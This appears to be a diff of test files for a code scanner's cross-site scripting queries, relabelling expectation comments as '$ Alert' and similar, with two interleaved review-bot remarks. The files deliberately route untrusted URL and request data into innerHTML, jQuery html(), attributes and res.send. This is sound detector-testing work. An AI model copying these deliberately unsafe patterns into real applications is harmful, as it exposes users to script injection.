@@ -452,53 +435,53 @@ const ansiToHtml = new Convert(); function ansiToHTML() { var source = document.location.search; - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { var source = document.location.search; let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { var url = document.location.search.substr(1); - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = 
require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); @@ -506,7 +489,7 @@ function Foo() { function nonGlobalSanitizer() { var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..16932da72c05 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js 
@@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK - -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert + +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a1302d196a7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -22,7 +22,7 @@ }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js index f35e603228d6..957fe1ba0497 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/various-concat-obfuscations.js @@ -1,15 +1,15 @@ function test() { let tainted = document.location.search; - $("
    " + tainted + "
    "); // NOT OK - $(`
    ${tainted}
    `); // NOT OK - $("
    ".concat(tainted).concat("
    ")); // NOT OK - $(["
    ", tainted, "
    "].join()); // NOT OK + $("
    " + tainted + "
    "); // $ Alert + $(`
    ${tainted}
    `); // $ Alert + $("
    ".concat(tainted).concat("
    ")); // $ Alert + $(["
    ", tainted, "
    "].join()); // $ Alert - $("
    "); // NOT OK - $(`
    `); // NOT OK - $("
    ")); // NOT OK - $(["
    "].join()); // NOT OK + $("
    "); // $ Alert + $(`
    `); // $ Alert + $("
    ")); // $ Alert + $(["
    "].join()); // $ Alert function indirection1(attrs) { return '
    ' + content + '
    '; @@ -17,6 +17,6 @@ function test() { function indirection2(attrs) { return '
    '.concat(content)).concat('
    '); } - $(indirection1(document.location.search.attrs)); // NOT OK - $(indirection2(document.location.search.attrs)); // NOT OK + $(indirection1(document.location.search.attrs)); // $ Alert + $(indirection2(document.location.search.attrs)); // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js index 36dd5181a1b5..43c6618430e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js @@ -8,7 +8,7 @@ ajv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollDat app.post('/polldata', (req, res) => { if (!ajv.validate('pollData', req.body)) { - res.send(ajv.errorsText()); // NOT OK + res.send(ajv.errorsText()); // $ Alert } }); @@ -21,6 +21,6 @@ const joiSchema = joi.object().keys({ app.post('/votedata', (req, res) => { const val = joiSchema.validate(req.body); if (val.error) { - res.send(val.error); // NOT OK + res.send(val.error); // $ Alert } }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index 150b9e204fda..f8a3d5c09486 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js 
@@ -8,31 +8,31 @@ try { unknown(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { inner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown(foo + "bar"); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown({ prop: foo }); } catch (e) { - $('myId').html(e); // NOT OK! - but not detected due to not tainting object that have a tainted propety. [INCONSISTENCY] + $('myId').html(e); // $ MISSING: Alert - - but not detected due to not tainting object that have a tainted propety. } try { unknown(["bar", foo]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } function deep(x) { @@ -45,13 +45,13 @@ try { deep("bar" + foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { var tmp = "bar" + foo; } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function safe(x) { @@ -61,13 +61,13 @@ try { safe(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { safe.call(null, foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } var myWeirdInner; try { @@ -75,12 +75,12 @@ inner(x); } } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { myWeirdInner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } $('myId').html(foo); // Direct leak, reported by other query. @@ -88,13 +88,13 @@ try { unknown(foo.match(/foo/)); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown([foo, "bar"]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { @@ -104,7 +104,7 @@ // nothing } } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } }); 
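Review bot: The converted comment on the `unknown({ prop: foo })` case reads `// $ MISSING: Alert - - but not detected due to not tainting object that have a tainted propety.`, with a doubled dash and the typo carried over from the old text. This line documents a known false negative of the query, so it is worth making readable: `$('myId').html(e); // $ MISSING: Alert - objects that have a tainted property are not themselves tainted`.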
@@ -116,7 +116,7 @@ app.get('/user/:id', function (req, res) { try { unknown(req.params.id); } catch (e) { - res.send("Exception: " + e); // NOT OK! + res.send("Exception: " + e); // $ Alert } }); @@ -127,7 +127,7 @@ app.get('/user/:id', function (req, res) { try { unknown(sessionStorage.getItem('exceptionSession')); } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } })(); @@ -135,10 +135,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert return; } - $('myId').html(res); // OK (for now?) + $('myId').html(res); // OK - for now? }); }); @@ -146,25 +146,25 @@ app.get('/user/:id', function (req, res) { var foo = document.location.search; new Promise(resolve => unknown(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); try { null[foo]; } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } try { unknown()[foo]; } catch (e) { - $('myId').html(e); // OK. We are not sure that `unknown()` is null-ish. + $('myId').html(e); // OK - We are not sure that `unknown()` is null-ish. } try { "foo"[foo] } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function inner(tainted, resolve) { @@ -172,16 +172,16 @@ app.get('/user/:id', function (req, res) { } new Promise(resolve => inner(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); })(); app.get('/user/:id', function (req, res) { unknown(req.params.id, (error, res) => { if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert } - $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. + $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. }); }); 
@@ -189,7 +189,7 @@ app.get('/user/:id', function (req, res) { try { res.send(req.params.id); } catch(err) { - res.send(err); // OK (the above `res.send()` is already reported by js/xss) + res.send(err); // OK - (the above `res.send()` is already reported by js/xss) } }); @@ -210,7 +210,7 @@ var fs = require("fs"); log.info(foo); localStorage.setItem(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index c3b1cbc2da8a..ef82f644a049 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -4,8 +4,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // BAD: a request parameter is incorporated without validation into the response - res.send("Unknown user: " + req.params.id); + res.send("Unknown user: " + req.params.id); // $ Alert - a request parameter is incorporated without validation into the response moreBadStuff(req.params, res); } else { // TODO: do something exciting 
@@ -14,32 +13,32 @@ app.get('/user/:id', function(req, res) { }); function moreBadStuff(params, res) { - res.send("Unknown user: " + params.id); // NOT OK + res.send("Unknown user: " + params.id); // $ Alert } var marked = require("marked"); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(marked(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(marked(req.body)); // $ Alert }); var table = require('markdown-table') app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert var mytable = table([ ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // NOT OK - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps }); var showdown = require('showdown'); var converter = new showdown.Converter(); app.get('/user/:id', function(req, res) { - res.send(req.body); // NOT OK - res.send(converter.makeHtml(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(converter.makeHtml(req.body)); // $ Alert }); var unified = require('unified'); @@ -53,7 +52,7 @@ var sanitize = require("rehype-sanitize"); const { resetExtensions } = require('showdown'); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK + res.send(req.body); // $ Alert unified() .use(markdown) 
@@ -62,17 +61,17 @@ app.get('/user/:id', function (req, res) { .use(format) .use(html) .process(req.body, function (err, file) { - res.send(file); // NOT OK + res.send(file); // $ Alert }); - res.send(remark().processSync(req.body).toString()); // NOT OK + res.send(remark().processSync(req.body).toString()); // $ Alert - res.send(remark().use(sanitize).processSync(req.body).toString()); // OK + res.send(remark().use(sanitize).processSync(req.body).toString()); - res.send(unified().use(markdown).processSync(req.body).toString); // NOT OK + res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert remark().process(req.body, (e, f) => { - res.send(f); // NOT OK + res.send(f); // $ Alert }) }); @@ -80,9 +79,9 @@ import snarkdown from 'snarkdown'; var snarkdown2 = require("snarkdown"); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(snarkdown(req.body)); // NOT OK - res.send(snarkdown2(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(snarkdown(req.body)); // $ Alert + res.send(snarkdown2(req.body)); // $ Alert }); const markdownIt = require('markdown-it')({ 
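Review bot: `res.send(unified().use(markdown).processSync(req.body).toString); // $ Alert` passes the `toString` method itself rather than its result, unlike the `remark().processSync(req.body).toString()` line just above it. This predates the commit, but the new annotation now pins an expected alert on it. If the missing call is a typo, `...processSync(req.body).toString()); // $ Alert` would test the intended flow; if it is deliberate, a suffix such as `// $ Alert - method reference, not called` would say so. The handler starts above this hunk.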
@@ -94,20 +93,20 @@ const markdownIt3 = require('markdown-it')({html: true}) .use(require('markdown-it-highlightjs')); app.get('/user/:id', function (req, res) { - res.send(req.body); // NOT OK - res.send(markdownIt.render(req.body)); // NOT OK + res.send(req.body); // $ Alert + res.send(markdownIt.render(req.body)); // $ Alert res.send(markdownIt2.render(req.body)); // OK - no html - res.send(markdownIt3.render(req.body)); // NOT OK + res.send(markdownIt3.render(req.body)); // $ Alert - res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. - res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // NOT OK + res.send(markdownIt.use(require('markdown-it-sanitizer')).render(req.body)); // OK - HTML is sanitized. + res.send(markdownIt.use(require('markdown-it-abbr')).use(unknown).render(req.body)); // $ Alert }); var Hapi = require('hapi'); var hapi = new Hapi.Server(); hapi.route({ handler: function (request){ - return request.query.p; // NOT OK + return request.query.p; // $ Alert }}); app.get("invalid/keys/:id", async (req, res) => { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js index 64acfded0a63..cf89f45b9692 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssContentTypes.js @@ -7,7 +7,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is plain text } else { res.set('Content-Type', 'text/html'); - res.send("FOO: " + req.params.id); // NOT OK - content type is HTML. + res.send("FOO: " + req.params.id); // $ Alert - content type is HTML. } }); 
@@ -17,7 +17,7 @@ app.get('/user/:id', function (req, res) { res.send("FOO: " + req.params.id); // OK - content type is JSON } else { res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. } }); @@ -36,10 +36,10 @@ app.get('/user/:id', function (req, res) { app.get('/user/:id', function (req, res) { if (err) { res.statusCode = 404; - res.end("FOO: " + req.params.id); // NOT OK + res.end("FOO: " + req.params.id); // $ Alert } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -50,10 +50,10 @@ function textContentType() { app.get('/user/:id', function (req, res) { if (err) { res.header({'Content-Type': textContentType()}); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } else { res.setHeader('Content-Type', 'text/plain;charset=utf8'); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); } }); @@ -67,13 +67,13 @@ app.get('/user/:id', function (req, res) { somethingMore(); while(Math.random()) {}; res.writeHead(404); - res.send("FOO: " + req.params.id); // NOT OK - content type is not set. + res.send("FOO: " + req.params.id); // $ Alert - content type is not set. }); app.get('/user/:id', function (req, res) { res.header({'Content-Type': textContentType()}); myFancyFunction(() => { - res.send("FOO: " + req.params.id); // OK + res.send("FOO: " + req.params.id); }); - res.end("FOO: " + req.params.id); // OK + res.end("FOO: " + req.params.id); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js index c6635459f42f..a92226bff122 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood.js @@ -5,7 +5,7 @@ var app = express(); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: request parameter is sanitized before incorporating it into the response + // OK - request parameter is sanitized before incorporating it into the response res.send("Unknown user: " + escape(req.params.id)); else // TODO: do something exciting @@ -15,13 +15,13 @@ app.get('/user/:id', function(req, res) { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) - // GOOD: templating prevents XSS + // OK - templating prevents XSS res.render(invalidUserIdTemplate, { id: req.params.id }); }); app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', 'text/plain'); res.send("Unknown user: " + req.params.id); } else @@ -35,7 +35,7 @@ function textContentType() { app.get('/user/:id', function(req, res) { if (!isValidUserId(req.params.id)) { - // GOOD: response content type set to text + // OK - response content type set to text res.set('Content-Type', textContentType()); res.send("Unknown user: " + req.params.id); } else @@ -53,7 +53,7 @@ app.get('/echo', function(req, res) { app.get('/user/:id', function(req, res) { const url = req.params.id; if (!/["'&<>]/.exec(url)) { - res.send(url); // OK + res.send(url); } }); @@ -66,7 +66,7 @@ function escapeHtml1 (str) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK + res.send(escapeHtml1(url)); }); const matchHtmlRegExp = /["'&<>]/; @@ -82,6 +82,6 @@ function escapeHtml2 (string) { app.get('/user/:id', function(req, res) { const url = req.params.id; - res.send(escapeHtml2(url)); // OK + res.send(escapeHtml2(url)); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js index 2217ab783ac7..5ab9f9d6f265 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssGood3.js @@ -134,9 +134,9 @@ function escapeHtml4(s) { app.get('/user/:id', function (req, res) { const url = req.params.id; - res.send(escapeHtml1(url)); // OK - res.send(escapeHtml2(url)); // OK - res.send(escapeHtml3(url)); // OK - but FP [INCONSISTENCY] - res.send(escapeHtml4(url)); // OK + res.send(escapeHtml1(url)); + res.send(escapeHtml2(url)); + res.send(escapeHtml3(url)); // $ SPURIOUS: Alert - FP + res.send(escapeHtml4(url)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js index c30ab48a511d..3fba93d3b4a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js @@ -5,6 +5,6 @@ var app = express(); app.use(cookieParser()); app.get('/cookie/:name', function(req, res) { - // OK + res.send("Here, have a cookie: " + req.cookies[req.params.name]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 45ad3a94920c..448f12270783 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js @@ -2,7 +2,7 @@ var express = require('express'); express().get('/user/', function(req, res) { var evil = req.query.evil; - res.send(console.log("
    %s
    ", evil)); // OK (returns undefined) - res.send(util.format("
    %s
    ", evil)); // NOT OK - res.send(require("printf")("
    %s
    ", evil)); // NOT OK + res.send(console.log("
    %s
    ", evil)); // OK - returns undefined + res.send(util.format("
    %s
    ", evil)); // $ Alert + res.send(require("printf")("
    %s
    ", evil)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index aed560fc0767..cd6ca0c9e3da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -3,13 +3,13 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { const tainted = req.url; - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }); var params = { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 4b2edd4e4faf..105080e5fba2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -7,7 +7,7 @@ let app = express(); app.get("/some/path", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = sendResponse.bind(null, req.url); @@ -16,7 +16,7 @@ app.get("/some/path", (req, res) => { app.get("/underscore", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = underscore.partial(sendResponse, req.url); @@ -25,7 +25,7 @@ app.get("/underscore", (req, res) => { app.get("/lodash", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = lodash.partial(sendResponse, req.url); 
@@ -34,7 +34,7 @@ app.get("/lodash", (req, res) => { app.get("/ramda", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } let callback = R.partial(sendResponse, [req.url]); @@ -49,7 +49,7 @@ app.get("/return", (req, res) => { let callback = getFirst.bind(null, req.url); res.send(callback); // OK - the callback itself is not tainted - res.send(callback()); // NOT OK - but not currently detected [INCONSISTENCY] + res.send(callback()); // $ MISSING: Alert - not currently detected res.send(getFirst("Hello")); // OK - argument is not tainted from this call site }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index d48ec23af5f1..392a1f7ec612 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -3,9 +3,9 @@ let app = express(); app.get("/some/path", (req, res) => { new Promise((resolve, reject) => resolve(req.query.data)) - .then(x => res.send(x)); // NOT OK + .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) .then(x => escapeHtml(x)) - .then(x => res.send(x)); // OK + .then(x => res.send(x)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 60399a9b63d6..35021ea39120 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js @@ -4,8 +4,8 @@ var app = express(); app.get('/user/:id', function(req, res) { let { p, q: r } = req.params; - res.send(p); // NOT OK - res.send(r); // NOT OK + res.send(p); // $ Alert + res.send(r); // $ Alert }); const aKnownValue = "foo"; 
@@ -14,13 +14,13 @@ app.get('/bar', function(req, res) { let { p } = req.params; if (p == aKnownValue) - res.send(p); // OK - res.send(p); // NOT OK + res.send(p); + res.send(p); // $ Alert if (p != aKnownValue) - res.send(p); // NOT OK + res.send(p); // $ Alert else - res.send(p); // OK + res.send(p); }); @@ -33,8 +33,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = clone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const serializeJavaScript = require('serialize-javascript'); @@ -44,11 +44,11 @@ app.get('/baz', function(req, res) { var serialized = serializeJavaScript(p); - res.send(serialized); // OK + res.send(serialized); var unsafe = serializeJavaScript(p, {unsafe: true}); - res.send(unsafe); // NOT OK + res.send(unsafe); // $ Alert }); const fclone = require('fclone'); @@ -60,8 +60,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = fclone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const jc = require('json-cycle'); @@ -72,8 +72,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = jc.retrocycle(jc.decycle(obj)); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const sortKeys = require('sort-keys'); @@ -85,6 +85,6 @@ app.get('/baz', function(req, res) { obj.p = p; var other = sortKeys(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index c7d0fd91a4a0..61d153498e74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js 
@@ -3,11 +3,11 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { let { p } = req.params; - res.send(p); // NOT OK + res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { const code = prettier.format(reg.body, { semi: false, parser: "babel" }); - res.send(code); // NOT OK + res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index c04e0d784efc..be96d05a400a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -5,7 +5,7 @@ var express = require('express'); express().get('/', function(req, res) { fs.readdir("/myDir", function (error, files1) { - res.send(files1); // NOT OK + res.send(files1); // $ Alert }); }); @@ -23,18 +23,18 @@ http.createServer(function (req, res) { } fs.readdir("/myDir", function (error, files1) { - res.write(files1); // NOT OK + res.write(files1); // $ Alert var dirs = []; var files2 = []; files1.forEach(function (file) { files2.push(file); }); - res.write(files2); // NOT OK + res.write(files2); // $ Alert var files3 = format(files2); - res.write(files3); // NOT OK + res.write(files3); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index dcf530e3ef5c..4f712f2604e7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js 
